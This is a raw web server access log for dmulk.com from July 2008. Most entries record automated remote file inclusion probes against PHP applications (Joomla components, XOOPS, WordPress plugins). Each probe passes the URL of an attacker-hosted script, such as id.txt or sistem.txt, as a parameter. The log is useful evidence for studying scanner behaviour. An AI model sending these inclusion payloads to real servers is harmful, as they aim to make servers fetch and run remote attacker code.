87.106.219.212 - - [14/Jul/2008:09:49:11 -0700] "GET /logs//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:11 -0700] "GET /logs//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:23 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:24 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:24 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:24 -0700] "GET //modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:29 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:36 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:36 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:36 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:36 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:36 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.219.212 - - [14/Jul/2008:09:49:36 -0700] "GET /logs/access_071225.log//modifyform.html?code=http://icqbomber.110mb.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.109.76.232 - - [14/Jul/2008:09:50:00 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.109.76.232 - - [14/Jul/2008:09:50:00 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://hscu.de/page/bilder/schult_a102.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:50:25 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:50:26 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:51:21 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:51:21 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - - [14/Jul/2008:09:51:46 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:51 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 32970 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:51 -0700] "GET /warboard/css/styles_screen.css HTTP/1.1" 200 5617 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:51 -0700] "GET /warboard/css/styles_print.css HTTP/1.1" 200 962 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:51 -0700] "GET /warboard/images/delete.gif HTTP/1.1" 200 213 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:51 -0700] "GET /warboard/images/update.gif HTTP/1.1" 200 245 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:51 -0700] "GET /warboard/images/details.gif HTTP/1.1" 200 215 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - - [14/Jul/2008:09:51:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - - [14/Jul/2008:09:51:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
68.8.232.250 - warboard [14/Jul/2008:09:51:56 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=1&order=FileNum&order_type=DESC HTTP/1.1" 200 32801 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:09:52:06 -0700] "GET /blane/?N=D HTTP/1.0" 200 649 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:53:08 -0700] "GET /logs/access_080315.log//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.67.51 - - [14/Jul/2008:09:53:32 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [14/Jul/2008:09:53:33 -0700] "GET //wp-content/plugins/mygallery/myfunctions/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.67.51 - - [14/Jul/2008:09:53:33 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:09:53:50 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:09:53:55 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:09:54:28 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:09:54:29 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:09:54:29 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.158.102.198 - - [14/Jul/2008:09:54:31 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:09:54:37 -0700] "GET /logs/access_080315.log//skin/zero_vote/ask_password.php?dir=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:09:54:57 -0700] "GET //components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:09:54:58 -0700] "GET //components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.54.28.163 - - [14/Jul/2008:09:55:13 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:09:55:29 -0700] "GET /logs/access_080313.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.209.119.162 - - [14/Jul/2008:09:56:11 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.71.249.147 - - [14/Jul/2008:09:56:13 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.98.222.137 - - [14/Jul/2008:09:56:48 -0700] "GET /logs/access_080303.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [14/Jul/2008:09:57:02 -0700] "GET /logs/access_080225.log//modules/My_eGallery/index.php?basepath=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [14/Jul/2008:09:57:03 -0700] "GET //modules/My_eGallery/index.php?basepath=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [14/Jul/2008:09:57:03 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:57:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:09:57:09 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [14/Jul/2008:09:57:28 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://djcom.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [14/Jul/2008:09:57:28 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://djcom.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [14/Jul/2008:09:57:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://djcom.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.10.200 - - [14/Jul/2008:09:57:30 -0700] "GET /administrator/components/com_remository/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:09:57:33 -0700] "GET /logs/access.log//components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:09:57:34 -0700] "GET //components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:09:57:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:09:57:36 -0700] "GET /logs//components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.64.195.220 - - [14/Jul/2008:09:57:38 -0700] "GET /logs/access_080119.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://djcom.altervista.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:09:57:49 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:57:55 -0700] "GET /logs/middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.197 - - [14/Jul/2008:09:57:55 -0700] "GET /middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:09:58:02 -0700] "GET /logs/access_080207.log//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:09:58:03 -0700] "GET //components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:09:58:03 -0700] "GET /logs//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:58:09 -0700] "GET /logs/middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:58:10 -0700] "GET /middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:09:58:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.230.236 - - [14/Jul/2008:09:58:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.230.236 - - [14/Jul/2008:09:58:39 -0700] "GET /logs/access_080313.log HTTP/1.1" 200 491234 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.98.89.90 - - [14/Jul/2008:09:58:41 -0700] "GET /logs/access_071225.log//components/com_extcalendar/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:58:47 -0700] "GET /logs/str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:58:47 -0700] "GET /logs/str.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:58:47 -0700] "GET /str.php?p=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [14/Jul/2008:09:58:48 -0700] "GET /str.php?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:59:10 -0700] "GET /logs/access_080315.log/components/com_performs/performs.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:59:11 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:59:11 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:09:59:25 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:09:59:32 -0700] "GET /bikes/WeSTOC08/dmulk_WeSTOC08_II.gpx HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:09:59:40 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:09:59:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:59:54 -0700] "GET /logs/middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [14/Jul/2008:09:59:54 -0700] "GET /middle.php?file=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:00:04 -0700] "GET /logs/access_071219.log//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.125 - - [14/Jul/2008:10:00:05 -0700] "GET /blog/ HTTP/1.0" 200 18252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [14/Jul/2008:10:00:05 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [14/Jul/2008:10:00:06 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [14/Jul/2008:10:00:06 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:00:21 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:00:22 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:00:29 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:00:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:10:00:37 -0700] "GET /logs/index.php?canal=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:10:00:40 -0700] "GET /index.php?canal=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 200 18471 "-" "libwww-perl/5.803" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:00:46 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:00:47 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:00:47 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:01:10 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.200 - - [14/Jul/2008:10:01:30 -0700] "GET /logs/access.log/administrator/components/com_remository/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.102.10.200 - - [14/Jul/2008:10:01:31 -0700] "GET /administrator/components/com_remository/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.102.10.200 - - [14/Jul/2008:10:01:31 -0700] "GET /logs/administrator/components/com_remository/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:02:02 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:02:02 -0700] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:02:02 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
